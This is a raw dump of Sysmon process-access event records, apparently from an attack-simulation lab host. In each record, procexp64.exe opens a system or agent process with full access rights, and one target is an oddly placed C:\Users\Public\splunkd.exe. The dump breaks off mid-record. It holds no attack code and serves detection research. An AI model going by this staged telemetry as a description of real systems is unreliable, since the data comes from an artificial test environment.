10341000x8000000000000000790214Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790213Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790212Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790211Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790210Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790209Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790208Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790207Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790206Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790205Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790204Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790203Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790202Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790201Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790200Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790199Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790198Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790197Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790196Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790195Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790194Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790193Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790192Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790191Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790190Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790189Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790188Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790187Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790186Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790185Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790184Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790183Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790182Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790181Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790180Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790179Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790178Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790177Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 